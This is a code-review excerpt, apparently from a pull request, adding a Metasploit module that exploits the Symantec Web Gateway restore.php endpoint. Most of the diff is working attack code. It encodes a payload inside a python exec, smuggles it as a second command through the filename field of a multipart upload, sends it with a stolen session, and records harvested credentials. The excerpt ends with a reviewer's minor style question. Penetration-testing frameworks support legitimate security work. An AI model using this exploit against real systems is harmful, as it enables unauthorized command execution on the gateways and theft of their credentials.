modules/exploits/linux/http/symantec_web_gateway_restore.rb

```diff
@@ -0,0 +1,243 @@
+    p = payload.encoded
+
+    case datastore['PAYLOAD']
+    when /cmd\/unix\/generic/
+      # Filter that one out, Mr. basename()
+      p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))")
+      p = "python -c \"exec('#{p}'.decode('base64'))\""
+    else
+      p = p.gsub(/python -c "exec/, 'python -c \\"exec')
+      p = p.gsub(/decode\('base64'\)\)"/, "decode('base64'))\\\"")
+    end
+
+    p
+  end
+
+  def build_mime
+    p = build_payload
+
+    data = Rex::MIME::Message.new
+    data.add_part("#{Time.now.to_i}", nil, nil, 'form-data; name="posttime"')
+    data.add_part('maintenance', nil, nil, 'form-data; name="configuration"')
+    data.add_part('', 'application/octet-stream', nil, 'form-data; name="licenseFile"; filename=""')
+    data.add_part('24', nil, nil, 'form-data; name="raCloseInterval"')
+    data.add_part('', nil, nil, 'form-data; name="restore"')
+    data.add_part("#{Rex::Text.rand_text_alpha(4)}\n", 'text/plain', nil, "form-data; name=\"restore_file\"; filename=\"#{Rex::Text.rand_text_alpha(4)}.txt; #{p}\"")
+    data.add_part('Restore', nil, nil, 'form-data; name="restoreFile"')
+    data.add_part('0', nil, nil, 'form-data; name="event_horizon"')
+    data.add_part('0', nil, nil, 'form-data; name="max_events"')
+    data.add_part(Time.now.strftime("%m/%d/%Y"), nil, nil, 'form-data; name="cleanlogbefore"')
+    data.add_part('', nil, nil, 'form-data; name="testaddress"')
+    data.add_part('', nil, nil, 'form-data; name="pingaddress"')
+    data.add_part('and', nil, nil, 'form-data; name="capture_filter_op"')
+    data.add_part('', nil, nil, 'form-data; name="capture_filter"')
+
+    data
+  end
+
+  def inject_exec(sid)
+    uri = target_uri.path
+    mime = build_mime # Payload inside
+    send_request_cgi({
+      'uri'     => normalize_uri(uri, 'spywall/restore.php'),
+      'method'  => 'POST',
+      'cookie'  => sid,
+      'data'    => mime.to_s,
+      'ctype'   => "multipart/form-data; boundary=#{mime.bound}",
+      'headers' => {
+        'Referer' => "#{protocol}://#{peer}#{normalize_uri(uri, 'spywall/mtceConfig.php')}"
+      }
+    })
+  end
+
+  def save_cred(username, password)
+    service_data = {
+      address: rhost,
+      port: rport,
+      service_name: protocol,
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      username: username,
+      private_data: password,
+      private_type: :password
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def exploit
+    print_status("Getting the PHPSESSID...")
+    sid = get_sid
+    if sid.blank?
```

Comment:
@wchen-r7 just a general question: should we use `blank?` in modules or is it better to stick with `empty?` to have no RoR dependency here?